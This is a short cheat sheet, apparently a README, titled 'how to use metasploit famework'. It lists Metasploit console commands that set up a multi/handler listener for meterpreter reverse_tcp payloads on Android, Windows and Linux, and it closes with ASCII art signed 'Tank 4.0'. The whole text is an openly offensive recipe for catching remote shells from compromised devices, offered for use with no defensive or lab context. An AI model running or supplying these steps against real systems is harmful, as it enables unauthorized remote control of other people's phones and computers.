how to use metasploit famework

## android

use exploit/multi/handler

##

set payload android/meterpreter/reverse_tcp

## 

set lhost ip you

##

set lport port you

##

exploit or run

## windows

use exploit/multi/handler

##

set payload windows/meterpreter/reverse_tcp

##

set lhost ip you

##

set lport port you

##

exploit or run

##

## Linux

use exploit/multi/handler

##

set PAYLOAD linux/x86/meterpreter/reverse_tcp

##

set lhost ip you

##

set lport port you

##

exploit or run

#############  -------[*****]
#                  ///////////
#  $     $      |||||||||||||||||
#             (+++++++++++++++++++)
# -      -     -------------------
#  -    -  
#    - -          Tank 4.0 @localhost

